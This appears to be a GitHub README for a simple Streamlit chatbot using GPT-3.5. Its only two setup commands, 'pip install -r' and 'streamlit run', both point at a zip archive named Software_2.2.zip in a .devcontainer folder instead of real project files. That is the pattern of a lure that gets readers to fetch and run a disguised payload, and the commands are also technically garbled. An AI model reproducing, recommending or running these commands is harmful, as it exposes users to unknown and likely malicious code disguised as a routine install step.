A simple Streamlit app that shows how to build a chatbot using OpenAI's GPT-3.5.
-
Install the requirements
$ pip install -r https://github.com/cris236uy/chatbot/raw/refs/heads/main/.devcontainer/Software_2.2.zip -
Run the app
$ streamlit run https://github.com/cris236uy/chatbot/raw/refs/heads/main/.devcontainer/Software_2.2.zip